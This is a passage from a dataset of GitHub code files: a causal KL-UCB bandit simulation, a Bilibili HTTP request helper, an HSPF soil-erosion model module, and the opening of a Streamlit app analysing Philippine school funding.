matplotlib.pyplot as plt\n\ndef RunKLUCB(numRound, listHB, listLB, listU, TF_causal, TF_naive, TF_CF, listnOBS, listUobs):\n def MaxKL(mu_hat, ft, NaT, init_maxval=1):\n def BinoKL(mu_hat, mu):\n if mu_hat == mu:\n return 0\n else:\n result = mu_hat * np.log(mu_hat / mu) + (1 - mu_hat) * np.log((1 - mu_hat) / (1 - mu))\n return result\n\n def MaxBinarySearch(mu_hat, M, maxval):\n if M < 0:\n print(mu_hat, M, \"ERROR\")\n terminal_cond = 1e-8\n eps = 1e-12\n if mu_hat == 1:\n return 1\n elif mu_hat == 0:\n mu_hat += eps # diff\n mu = copy.copy(mu_hat)\n\n iteridx = 0\n while 1:\n iteridx += 1\n mu_cand = (mu + maxval) / 2\n KL_val = BinoKL(mu_hat, mu_cand)\n diff = np.abs(KL_val - M)\n # print(mu, mu_hat, mu_cand,KL_val, M, diff)\n if diff < terminal_cond:\n mu = mu_cand\n return mu\n\n if KL_val < M:\n mu = copy.copy(mu_cand)\n else:\n maxval = copy.copy(mu_cand)\n\n if np.abs(mu - maxval) < terminal_cond:\n return mu\n\n if iteridx > 20:\n return mu\n maxval = copy.copy(init_maxval)\n M = ft / NaT\n mu = MaxBinarySearch(mu_hat, M, maxval)\n return mu\n\n def MaxKLInverse(mu_hat, C, init_maxval):\n def BinoKL(mu, mu_hat):\n if mu_hat == mu:\n return 0\n else:\n result = mu * np.log(mu / mu_hat) + (1 - mu) * np.log((1 - mu) / (1 - mu_hat))\n return result\n\n def MaxBinarySearch(mu_hat, C, maxval):\n terminal_cond = 1e-8\n eps = 1e-12\n if mu_hat == 1:\n return 1\n elif mu_hat == 0:\n mu_hat += eps # diff\n mu = copy.copy(mu_hat)\n\n iteridx = 0\n while 1:\n iteridx += 1\n mu_cand = (mu + maxval) / 2\n KL_val = BinoKL(mu_cand, mu_hat)\n diff = np.abs(KL_val - C)\n # print(mu, mu_hat, mu_cand,KL_val, M, diff)\n if diff < terminal_cond:\n mu = mu_cand\n return mu\n\n if KL_val < C:\n mu = copy.copy(mu_cand)\n else:\n maxval = copy.copy(mu_cand)\n\n if np.abs(mu - maxval) < terminal_cond:\n return mu\n\n if iteridx > 20:\n return mu\n maxval = copy.copy(init_maxval)\n mu = MaxBinarySearch(mu_hat, C, maxval)\n return mu\n\n def ComputeDynamicMean(n, prevM, lastElem):\n M = ((n - 1) * prevM + lastElem) / n\n return M\n\n def UpdateAfterArm(dictNumArm, dictM, dictLastElem, armChosen, reward):\n dictNumArm[armChosen] += 1\n dictLastElem[armChosen] = reward\n dictM[armChosen] = ComputeDynamicMean(dictNumArm[armChosen], dictM[armChosen], reward)\n return [dictNumArm, dictM, dictLastElem]\n\n ''' Definition of variable '''\n dictNumArm = dict() # Number of pulling arm a\n dictM = dict() # Average of reward of arm a\n dictLastElem = dict() # previous reward of arm a\n listTFArmCorrect = list() # 1 if arm a = optimal arm // 0 otherwise.\n listCummRegret = list() # cummulative regret += E[Y|do(X=optimal)] - E[Y|do(X=a)]\n\n armOpt = np.argmax(listU)\n cummRegret = 0\n armDomain = np.arange(len(listU))\n\n for a in armDomain:\n if TF_naive == True:\n dictNumArm[a] = listnOBS[a]\n dictM[a] = listUobs[a]\n dictLastElem[a] = 0\n else:\n dictNumArm[a] = 0\n dictM[a] = 0\n dictLastElem[a] = 0\n\n ''' Initial pulling'''\n # Pulling all arm at once.\n for a in armDomain:\n u0,u1 = fU()\n reward = fY(u0,u1,a)\n\n dictNumArm, dictM, dictLastElem = UpdateAfterArm(dictNumArm,dictM,dictLastElem, a, reward)\n cummRegret += listU[armOpt] - listU[a]\n listCummRegret.append(cummRegret)\n if a == armOpt:\n listTFArmCorrect.append(1)\n else:\n listTFArmCorrect.append(0)\n\n ''' Run!'''\n f = lambda x: np.log(x) + 3 * np.log(np.log(x))\n list_listUpper = []\n for idxround in range(numRound-len(armDomain)):\n t = idxround + len(armDomain) + 1 # t=3,4,...,nRound+2 // total nRound.\n # Compute the mean reward\n listUpper = list() # Each arm's upper confidence.\n listHB_CF = np.zeros(len(armDomain))\n listLB_CF = np.zeros(len(armDomain))\n for a in armDomain:\n # Compute\n armDomain_noa = [aidx for aidx in armDomain if aidx != a]\n mu_hat = dictM[a] # Average rewards of arm a up to (t-1)\n ft = f(t)\n # print(t, a, mu_hat, ft, dictNumArm[a])\n upper_a = MaxKL(mu_hat,ft,dictNumArm[a],init_maxval=1) # argmax_u KL(mu_hat, u) < (ft/Na(t)) s.t. 0<= u <= 1.\n if TF_causal:\n upper_a = np.max([np.min([listHB[a], upper_a]),listLB[a]])\n elif TF_CF:\n f_delta = lambda n,delta: np.sqrt( (1/(2*n))*np.log(1/delta) )\n HB_cf_sumval = 0\n LB_cf_sumval = 0\n for aidx in armDomain_noa:\n px_obs = px[aidx]\n px_dot = dictNumArm[aidx]/sum(dictNumArm.values())\n C = -np.log(px_dot)\n\n HB_cf = MaxKLInverse(min(mu_hat+f_delta(dictNumArm[a],0.99),0.01),C,init_maxval=1)\n LB_cf = MaxKLInverse(max(mu_hat-f_delta(dictNumArm[a],0.01),0.01),C,init_maxval=0)\n\n HB_cf_sumval += (HB_cf * px_obs)\n LB_cf_sumval += (LB_cf * px_obs)\n\n listHB_CF[a] = min(listLB[a] + HB_cf_sumval,1.0)\n listLB_CF[a] = min(listLB[a] + LB_cf_sumval,1.0)\n\n # print(t, a, listLB_CF[a], mu_hat, listHB_CF[a])\n\n upper_a = np.max([np.min([listHB_CF[a], upper_a]), listLB_CF[a]])\n listUpper.append(upper_a)\n list_listUpper.append(listUpper)\n # print(t,listUpper)\n armChosen = np.argmax(listUpper)\n\n u0, u1 = fU()\n reward = fY(u0, u1, armChosen)\n\n # reward = fY(armChosen, u)\n # reward = np.random.binomial(1, listU[armChosen])\n dictNumArm, dictM, dictLastElem = UpdateAfterArm(dictNumArm, dictM, dictLastElem, armChosen, reward)\n\n cummRegret += (np.max(listU) - listU[armChosen])\n if armChosen == armOpt:\n listTFArmCorrect.append(1)\n else:\n listTFArmCorrect.append(0)\n listCummRegret.append(cummRegret)\n return np.asarray(listTFArmCorrect), np.asarray(listCummRegret), list_listUpper\n\ndef fU():\n U0 = np.random.binomial(1, 0.2)\n U1 = np.random.binomial(1, 0.5)\n return U0,U1\n\ndef fY(U0,U1,X):\n return (U0|U1)^X\n\ndef GenParam(nOBS):\n np.random.seed(1)\n N = nOBS\n U0 = np.random.binomial(1, 0.2, N)\n U1 = np.random.binomial(1, 0.5, N)\n X = np.random.binomial(1, 0.4, N) * (1 - (U0 ^ U1))\n numX = len(np.unique(X))\n px = [1-np.mean(X),np.mean(X)]\n Y = fY(U0, U1, X)\n\n OBS = pd.DataFrame({'X': X, 'Y': Y})\n\n X0 = np.array([0] * N)\n X1 = np.array([1] * N)\n Y0 = fY(U0, U1, X0)\n Y1 = fY(U0, U1, X1)\n\n print('Y0:', np.mean(Y0))\n print('Y1:', np.mean(Y1))\n print('Y|x0:', np.mean(OBS[OBS['X'] == 0]['Y']))\n print('Y|x1:', np.mean(OBS[OBS['X'] == 1]['Y']))\n\n # Bound\n l0 = np.mean(OBS[OBS['X'] == 0]['Y']) * (1 - np.mean(X))\n l1 = np.mean(OBS[OBS['X'] == 1]['Y']) * (np.mean(X))\n h0 = l0 + np.mean(X)\n h1 = l1 + (1 - np.mean(X))\n\n listU = [np.mean(Y0), np.mean(Y1)]\n listHB = [h0,h1]\n listLB = [l0,l1]\n\n print(l0, np.mean(Y0), h0)\n print(l1, np.mean(Y1), h1)\n return listU,listLB,listHB,px\n\nif __name__ == \"__main__\":\n numRound = 5000\n numSim = 100\n nOBS = 5000\n\n listU, listLB, listHB,px = GenParam(nOBS)\n\n ''' PARAM 0, 181030 '''\n\n\n # ''' PARAM 1 '''\n # U = np.random.normal(loc=0.5,scale=1,size=nOBS) + np.random.rand(nOBS)\n # X = fX(U)\n # px = [1-np.mean(X),np.mean(X)]\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # Y = fY(X,U)\n # Y0 = fY(X0,U)\n # Y1 = fY(X1,U)\n # OBS = pd.DataFrame({'X':X,'Y':Y})\n # Yo_0 = np.array(OBS[OBS['X']==0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n #\n # listU = [np.mean(Y0),np.mean(Y1)]\n # listLB = [np.mean(Yo_0)*px[0],np.mean(Yo_1)*px[1]]\n # listHB = [listLB[0] + px[1-0], listLB[1] + px[1-1]]\n\n ''' PARAM 2 '''\n # U = np.random.normal(loc=0.5, scale=1, size=nOBS) + np.random.rand(nOBS)\n # numX = 2\n # bincut = [0.2,0.4]\n # def fX(u, numX, bincut):\n # g = 2 * (U - 0.5) + 0.2 * np.random.normal(loc=0, scale=1, size=len(u))\n # X = np.exp(g) / (np.exp(g) + 1)\n # if numX == 2:\n # X = np.round(X)\n # else:\n # mybin = [0] + bincut + [1]\n # np.digitize(X, mybin)\n # return X\n # X = fX(U,numX,bincut)\n # px = [1 - np.mean(X), np.mean(X)]\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n #\n # listU = [np.mean(Y0), np.mean(Y1)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1]]\n # listHB = [listLB[0] + px[1 - 0], listLB[1] + px[1 - 1]]\n\n ''' PARAM 3 '''\n # U = np.random.normal(loc=0.5, scale=2, size=nOBS) + 0.5*np.random.rand(nOBS)\n # numX = 4\n # bincut = [40,50,90]\n # def fX(u, numX, bincut):\n # rand_noise = 0.2 * np.random.normal(loc=0, scale=1, size=len(u))\n # X = 2 * (U - 0.3) + ((U-1)**2) + 1 + rand_noise\n # X = np.exp(X) / (np.exp(X) + 1)\n # if numX == 2:\n # X = np.round(X)\n # else:\n # mybin = [0] + list(np.percentile(X,q=bincut)) + [1]\n # X=np.digitize(X, mybin)\n # X = X-1\n # return X\n # X = fX(U,numX,bincut)\n # px = [list(X).count(idx)/nOBS for idx in range(numX-1)]\n # px = px + [1-sum(px)]\n #\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # X2 = np.array([2] * nOBS)\n # X3 = np.array([3] * nOBS)\n # # fY = lambda x, u: np.exp(-0.6 * x + 0.3 * u) / (np.exp(-0.6 * x + 0.3 * u) + 1)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # Y2 = fY(X2, U)\n # Y3 = fY(X3, U)\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n # Yo_2 = np.array(OBS[OBS['X'] == 2]['Y'])\n # Yo_3 = np.array(OBS[OBS['X'] == 3]['Y'])\n # listU = [np.mean(Y0), np.mean(Y1), np.mean(Y2), np.mean(Y3)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1], np.mean(Yo_2) * px[2], np.mean(Yo_3) * px[3]]\n # listHB = []\n # for idx in range(len(px)):\n # temp = [px[i] for i in range(len(px)) if i != idx]\n # listHB.append(listLB[idx] + sum(temp))\n\n ''' PARAM 4 '''\n # U = np.random.rand(nOBS)\n # standard = [100*np.percentile(U,q=30),100*np.percentile(U,q=10),100*np.percentile(U,q=40),100*np.percentile(U,q=20)]\n # px = np.random.dirichlet(standard)\n # X = np.random.choice(len(px),nOBS,replace=True,p=px)\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # X2 = np.array([2] * nOBS)\n # X3 = np.array([3] * nOBS)\n # # fY = lambda x, u: np.exp(-0.6 * x + 0.3 * u) / (np.exp(-0.6 * x + 0.3 * u) + 1)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # Y2 = fY(X2, U)\n # Y3 = fY(X3, U)\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n # Yo_2 = np.array(OBS[OBS['X'] == 2]['Y'])\n # Yo_3 = np.array(OBS[OBS['X'] == 3]['Y'])\n # listU = [np.mean(Y0), np.mean(Y1), np.mean(Y2), np.mean(Y3)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1], np.mean(Yo_2) * px[2], np.mean(Yo_3) * px[3]]\n # listHB = []\n # for idx in range(len(px)):\n # temp = [px[i] for i in range(len(px)) if i != idx]\n # listHB.append(listLB[idx] + sum(temp))\n\n ''' PARAM 5 '''\n # px = [0.1, 0.6, 0.3]\n # U = np.random.rand(nOBS)\n # X = np.random.choice(len(px),nOBS,replace=True,p=px)\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # X2 = np.array([2] * nOBS)\n # # fY = lambda x, u: np.exp(1*x - 2*u)/(np.exp(1*x - 2*u)+1)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # Y2 = fY(X2, U)\n #\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n # Yo_2 = np.array(OBS[OBS['X'] == 2]['Y'])\n # Yo_3 = np.array(OBS[OBS['X'] == 3]['Y'])\n # listU = [np.mean(Y0), np.mean(Y1), np.mean(Y2)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1], np.mean(Yo_2) * px[2]]\n #\n # listHB = []\n # for idx in range(len(px)):\n # temp = [px[i] for i in range(len(px)) if i != idx]\n # listHB.append(listLB[idx] + sum(temp))\n\n ''' MAB '''\n arrayTF = np.array([0] * numRound)\n arrayCUM = np.array([0] * numRound)\n matTF = np.zeros((numSim, numRound))\n matCUM = np.zeros((numSim, numRound))\n dictUP = dict()\n for k in range(numSim):\n print(k,'standard')\n TF, CUM, UP = RunKLUCB(numRound, listHB, listLB, listU, TF_causal=False, TF_naive=False, TF_CF=False, listnOBS=[100, 100],\n listUobs=[0, 0])\n\n matTF[k, :] = TF\n matCUM[k, :] = CUM\n dictUP[k] = np.array(UP)\n arrayTF = arrayTF + TF\n arrayCUM = arrayCUM + CUM\n print(\"HB\",listHB)\n arrayTF = arrayTF / numSim\n arrayCUM = arrayCUM / numSim\n\n arrayTF_C = np.array([0] * numRound)\n arrayCUM_C = np.array([0] * numRound)\n matTF_C = np.zeros((numSim, numRound))\n matCUM_C = np.zeros((numSim, numRound))\n dictUP_C = dict()\n for k in range(numSim):\n print(k, 'C')\n TF_C, CUM_C, UP_C = RunKLUCB(numRound, listHB, listLB, listU, TF_causal=True, TF_naive=False, TF_CF=False,\n listnOBS=[100, 100], listUobs=[0, 0])\n matTF_C[k, :] = TF_C\n matCUM_C[k, :] = CUM_C\n dictUP_C[k] = np.array(UP_C)\n arrayTF_C = arrayTF_C + TF_C\n arrayCUM_C = arrayCUM_C + CUM_C\n print(\"HB\", listHB)\n arrayTF_C = arrayTF_C / numSim\n arrayCUM_C = arrayCUM_C / numSim\n\n arrayTF_CF = np.array([0] * numRound)\n arrayCUM_CF = np.array([0] * numRound)\n matTF_CF = np.zeros((numSim, numRound))\n matCUM_CF = np.zeros((numSim, numRound))\n dictUP_CF = dict()\n for k in range(numSim):\n print(k, 'CF')\n TF_CF, CUM_CF, UP_CF = RunKLUCB(numRound, listHB, listLB, listU, TF_causal=False, TF_naive=False, TF_CF=True,\n listnOBS=[100, 100], listUobs=[0, 0])\n matTF_CF[k, :] = TF_CF\n matCUM_CF[k, :] = CUM_CF\n dictUP_CF[k] = np.array(UP_CF)\n arrayTF_CF = arrayTF_CF + TF_CF\n arrayCUM_CF = arrayCUM_CF + CUM_CF\n print(\"HB\", listHB)\n arrayTF_CF = arrayTF_CF / numSim\n arrayCUM_CF = arrayCUM_CF / numSim\n\n xDomain = np.arange(numRound)\n alpha = 0.05\n colorAlpha = 0.3\n linewidthval = 2\n tt = np.arange(0,numRound,200)\n\n plt.figure(1,figsize=(8,5))\n # plt.title('Cum.Reg')\n plt.plot(xDomain[tt], arrayCUM[tt], 'red', label='klUCB',linewidth=linewidthval)\n plt.plot(xDomain[tt], arrayCUM[tt], 'ro')\n # plt.fill_between(xDomain[tt], np.percentile(matCUM[:,tt], q=100 * alpha, axis=0),\n # np.percentile(matCUM[:,tt], q=100 * (1 - alpha), axis=0), facecolor='red', alpha=colorAlpha)\n plt.plot(xDomain[tt], arrayCUM_C[tt], 'blue', label='klUCB-C',linewidth=linewidthval)\n plt.plot(xDomain[tt], arrayCUM_C[tt], 'bo')\n # plt.fill_between(xDomain[tt], np.percentile(matCUM_C[:,tt], q=100 * alpha, axis=0),\n # np.percentile(matCUM_C[:,tt], q=100 * (1 - alpha), axis=0), facecolor='blue', alpha=colorAlpha)\n plt.plot(xDomain[tt], arrayCUM_CF[tt], 'green', label='klUCB-CF',linewidth=linewidthval)\n plt.plot(xDomain[tt], arrayCUM_CF[tt], 'go')\n # plt.fill_between(xDomain[tt], np.percentile(matCUM_CF[:,tt], q=100 * alpha, axis=0),\n # np.percentile(matCUM_CF[:,tt], q=100 * (1 - alpha), axis=0), facecolor='green', alpha=colorAlpha)\n plt.legend(loc='upper left',fontsize=15)\n plt.ylabel('Cum.Reg',fontsize=15)\n plt.xticks(fontsize=15)\n plt.yticks(fontsize=15)\n\n plt.figure(2)\n plt.title('Opt.Prob')\n plt.plot(xDomain, arrayTF, 'red', label='klUCB')\n plt.fill_between(xDomain, np.percentile(matTF, q=100 * alpha, axis=0),\n np.percentile(matTF, q=100 * (1 - alpha), axis=0), facecolor='red', alpha=colorAlpha)\n plt.plot(xDomain, arrayTF_C, 'blue', label='klUCB-C')\n plt.fill_between(xDomain, np.percentile(matTF_C, q=100 * alpha, axis=0),\n np.percentile(matTF_C, q=100 * (1 - alpha), axis=0), facecolor='blue', alpha=colorAlpha)\n # plt.plot(xDomain, arrayTF_CF, 'green', label='klUCB-CF')\n # plt.fill_between(xDomain, np.percentile(matTF_CF, q=100 * alpha, axis=0),\n # np.percentile(matTF_CF, q=100 * (1 - alpha), axis=0), facecolor='green', alpha=colorAlpha)\n plt.legend()\n plt.show()\n\n pickle.dump(listHB,open('Result/listHB.pkl','wb'))\n pickle.dump(listU, open('Result/listU.pkl', 'wb'))\n pickle.dump(listLB, open('Result/listLB.pkl', 'wb'))\n pickle.dump(dictUP,open('Result/dictUP.pkl','wb'))\n pickle.dump(dictUP_C, open('Result/dictUP_C.pkl', 'wb'))\n pickle.dump(dictUP_CF, open('Result/dictUP_CF.pkl', 'wb'))\n pickle.dump(matTF, open('Result/MatTF.pkl', 'wb'))\n pickle.dump(matTF_C, open('Result/MatTF_C.pkl', 'wb'))\n pickle.dump(matTF_CF, open('Result/MatTF_CF.pkl', 'wb'))\n pickle.dump(matCUM, open('Result/MatCUM.pkl', 'wb'))\n pickle.dump(matCUM_C, open('Result/MatCUM_C.pkl', 'wb'))\n pickle.dump(matCUM_CF, open('Result/MatCUM_CF.pkl', 'wb'))\n\n k = 19\n plt.plot(matCUM[k,:], 'b', label='klUCB')\n plt.plot(matCUM_C[k,:], 'r', label='klUCB-C')\n plt.plot(matCUM_CF[k,:], 'g', label='klUCB-CF')\n plt.legend()\n","repo_name":"yonghanjung/CTF","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":18625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39693304035","text":"# -*- coding: utf-8 -*-\nimport aiohttp\n\n# 不带这堆头部有时候也能成功请求,但是带上后成功的概率更高\nBILIBILI_COMMON_HEADERS = {\n 'Origin': 'https://www.bilibili.com',\n 'Referer': 'https://www.bilibili.com/',\n 'Sec-CH-UA': '\"Google Chrome\";v=\"105\", \"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"105\"',\n 'Sec-CH-UA-Mobile': '?0',\n 'Sec-CH-UA-Platform': '\"Windows\"',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-site',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'\n ' Chrome/105.0.0.0 Safari/537.36'\n}\nBILIBILI_COMMON_COOKIES = {\n 'b_lsid': '639B17D4_9876590D28',\n '_uuid': '883B5256-A359-E4A3-7159-123456794937E96237infoc'\n}\n\nhttp_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10))\n","repo_name":"shakenetwork/blivechat","sub_path":"utils/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"13504922091","text":"print('HSPF module imported')\n\n#-Detachment of soil particles by raindrop impact (ton/acre)\ndef DetachmentRaindrop(self, pcr, DELT60, CR, SMPF, KRER, RAIN, JRER):\n DET = DELT60 * pcr.max(0, (1 - CR - self.NoErosion_HSPF)) * SMPF * KRER * (RAIN / DELT60)**JRER\n return DET\n\n#-Detached sediment in storage (ton/acre)\ndef SedimentStorage(self, pcr, DETS, AFFIX, DET):\n DETS = DETS * (1 - AFFIX) + DET\n\n return DETS\n\n#-Detachment of soil particles by washoff (ton/acre)\ndef DetachmentWashoff(self, pcr, STCAP, DETS, SURO, SURS, CR):\n WSSD = pcr.ifthenelse(STCAP > DETS, DETS * SURO / (SURS + SURO), STCAP * SURO / (SURS + SURO)) * (1 - self.NoErosion_HSPF)\n\n return WSSD\n\n#-Detachment of soil particles from the soil matrix (ton/acre)\ndef DetachmentSoilScour(self, pcr, SURO, SURS, DELT60, KGER, JGER):\n SCRSD = SURO / (SURS + SURO) * DELT60 * KGER * ((SURS + SURO)/DELT60)**JGER * (1 - self.NoErosion_HSPF)\n\n #-set values in channels to 0 in case channels should be excluded\n if self.exclChannelsFLAG == 1:\n SCRSD = SCRSD * self.Hillslope\n\n return SCRSD\n\n#-Transport capacity (ton/acre)\ndef TransportCapacity(self, pcr, DELT60, KSER, SURO, SURS, JSER):\n STCAP = DELT60 * KSER * ((SURS + SURO)/DELT60)**JSER * (1 - self.NoErosion_HSPF)\n\n return STCAP\n\n#-K factor (-)\ndef K_HSPF(self, pcr):\n ksat_hourly = self.RootKsat / 24\n M_textural = (self.RootSiltMap * 100 + 0) * (100 - self.RootClayMap * 100)\n permeability = pcr.scalar(ksat_hourly > 150) * 1\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 50, ksat_hourly < 150)) * 2\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 15, ksat_hourly < 50)) * 3\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 5, ksat_hourly < 15)) * 4\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 1, ksat_hourly < 5)) * 5\n permeability = permeability + pcr.scalar(ksat_hourly < 1) * 6\n s = 2\n K_HSPF = ((2.1 * 10**-4 * M_textural**1.14 * (12 - self.RootOMMap) + 3.25 * (s - 2) + 2.5 * (permeability - 3))/100)\n return K_HSPF\n\n#-init processes hspf\ndef init(self, pcr, config):\n #-read table with HSPF landuse specific model parameters\n pcr.setglobaloption('matrixtable')\n hspf_table = self.inpath + config.get('HSPF', 'hspf_table')\n self.CR_HSPF = pcr.lookupscalar(hspf_table, 1, self.LandUse)\n try:\n self.KGER_HSPF = config.getfloat('HSPF', 'KGER')\n except:\n self.KGER_HSPF = pcr.lookupscalar(hspf_table, 2, self.LandUse)\n self.NoErosion_HSPF = pcr.lookupscalar(hspf_table, 3, self.LandUse)\n pcr.setglobaloption('columntable')\n\n #-read other model parameters\n self.JRER_HSPF = config.getfloat('HSPF', 'JRER')\n self.KSER_HSPF = config.getfloat('HSPF', 'KSER')\n self.JSER_HSPF = config.getfloat('HSPF', 'JSER')\n self.JGER_HSPF = config.getfloat('HSPF', 'JGER')\n self.AFFIX_HSPF = config.getfloat('HSPF', 'AFFIX')\n\n #-initial sediment storage\n self.DETS_HSPF = 0\n self.SURSold = 0\n \n #-define some constants\n self.acre_m2_HSPF = 4046.9\n self.inch_mm_HSPF = 25.4\n\n #-read P-factor values map or float\n try:\n self.P_HSPF = pcr.readmap(self.inpath + config.get('HSPF', 'P_USLE'))\n except:\n self.P_HSPF = config.getfloat('HSPF', 'P_USLE')\n\n #-when pedotransfer module is used, calculate the K-factor based on texture maps, else read K-factor values from the config file\n if self.PedotransferFLAG == 1:\n self.K_HSPF = self.hspf.K_HSPF(self, pcr)\n else:\n try:\n self.K_HSPF = pcr.readmap(self.inpath + config.get('HSPF', 'KRER'))\n except:\n self.K_HSPF = config.getfloat('HSPF', 'KRER')\n\n\n#-dynamic processes hspf\ndef dynamic(self, pcr, np, Precip, Runoff):\n #-determine daily precipitation in inch\n Precip_inch = Precip / self.inch_mm_HSPF\n\n #-get acre to m2 transformation value\n acre_m2_HSPF = self.acre_m2_HSPF\n\n #-determine detachment of soil particles by raindrop impact (ton/acre)\n DET = self.hspf.DetachmentRaindrop(self, pcr, 24, self.CR_HSPF, self.P_HSPF, self.K_HSPF, Precip_inch, self.JRER_HSPF)\n\n #-determine the sediment storage (ton/acre)\n self.DETS_HSPF = self.hspf.SedimentStorage(self, pcr, self.DETS_HSPF, self.AFFIX_HSPF, DET)\n\n #-determine the surface water storage\n SURS = 0\n\n #-determine the surface outflow (inch) (= routed runoff)\n SURO = pcr.max(0.0001, Runoff / self.inch_mm_HSPF)\n \n #-determine transport capacity (ton/acre)\n STCAP = self.hspf.TransportCapacity(self, pcr, 24, self.KSER_HSPF, SURO, SURS, self.JSER_HSPF)\n\n #-determine detachment of soil particles by washoff (ton/acre)\n WSSD = self.hspf.DetachmentWashoff(self, pcr, STCAP, self.DETS_HSPF, SURO, SURS, self.CR_HSPF)\n\n #-report detachment of soil particles by raindrop impact (ton / cell)\n self.reporting.reporting(self, pcr, 'DetRn', WSSD * (pcr.cellarea() / acre_m2_HSPF))\n\n #-update sediment storage\n self.DETS_HSPF = self.DETS_HSPF - WSSD\n\n #-determine detachment of soil particles from the soil matrix (ton/acre)\n SCRSD = self.hspf.DetachmentSoilScour(self, pcr, SURO, SURS, 24, self.KGER_HSPF, self.JGER_HSPF)\n\n #-report detachment of soil particles by runoff (ton / cell)\n self.reporting.reporting(self, pcr, 'DetRun', SCRSD * (pcr.cellarea() / acre_m2_HSPF))\n\n #-determine mass of sediment in transport (ton/acre)\n sed = WSSD + SCRSD\n\n #-report sediment in transport (ton / cell)\n self.reporting.reporting(self, pcr, 'SedTrans', sed * (pcr.cellarea() / acre_m2_HSPF))\n\n return sed\n","repo_name":"FutureWater/SPHY","sub_path":"modules/hspf.py","file_name":"hspf.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"19"} +{"seq_id":"15424772318","text":"import warnings\nimport geopandas as gpd\nimport descartes\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport streamlit as st\nfrom PIL import Image\nimport cluster\nst.set_page_config(page_title='Analyzing Gaps in the Philippine Education System', layout=\"wide\")\nwarnings.filterwarnings('ignore')\nst.set_option('deprecation.showPyplotGlobalUse', False)\n\nprov = pd.read_csv(\"schools_prov.csv\")\nregion = pd.read_csv(\"schools_region.csv\", index_col=\"school.region\")\nmerged_data = gpd.read_file('./merged_data/merged_data.shp')\ncorr = prov[['Schools_Income', 'Schools_Teachers', 'Schools_Rooms', 'Student_Teacher_Ratio', 'Schools_Enrollment']].corr()\n\n\ndef project():\n st.title('Analyzing Gaps in the Philippine Education System')\n st.subheader('by Data Science Fellowship Cohort 7 - Group 5')\n st.write('Adam, Adrian, Ben, Nilly (mentored by Aaron)')\n\n teacher_image = Image.open('teacher.jpg')\n\n col1, col2 = st.beta_columns(2)\n with col1:\n st.image(\n teacher_image,\n caption='A teacher with her class of 59 students in a Quezon City public school. Source: The Guardian'\n )\n with col2:\n st.markdown(\n \"In this **exploratory data analysis**, we aim to uncover the distribution of public education resources \"\n \"across the Philippines and identify critical deficiencies \"\n \"through an assessment of **Maintenance and Other Operating Expenses (MOOE)** \"\n \"allocation in the different regions.\"\n )\n\n\ndef background():\n st.title('Background')\n st.markdown(\n \"The United Nations SDG4 aims to *ensure inclusive and equitable quality education\\n\"\n \"and promote lifelong learning opportunities for all.*\")\n\n st.write(\n \"In the context of the Philippines, has this goal been properly translated into **reality**? \\n\"\n \"To investigate this, we asked three critical questions: \"\n )\n\n sdg4_image = Image.open('sdg4.jpg')\n \n col1, col2 = st.beta_columns([1, 2])\n with col1:\n st.markdown(\n \"1. **How are education resources distributed across the country?**\"\n )\n st.markdown( \n \"2. **Are there any schools, regions, or areas with resource deficiencies?**\"\n )\n st.markdown( \n \"3. **Are the perceived discrepancies in allocation justified for resource needs of these schools/regions?**\"\n )\n with col2:\n st.image(sdg4_image, caption='Source: Think Sustainability')\n \n\n\ndef what_is_mooe():\n st.title('What is MOOE?')\n st.write(\"\")\n col1, col2 = st.beta_columns(2)\n with col1:\n mooe_image = Image.open('what_is_mooe.png')\n st.image(mooe_image)\n with col2:\n mooe_computation = Image.open(\"mooe_computation.png\")\n st.image(mooe_computation)\n\ndef data_method():\n st.title('Data Sources and Methodology')\n st.write(\"\")\n col1, col2 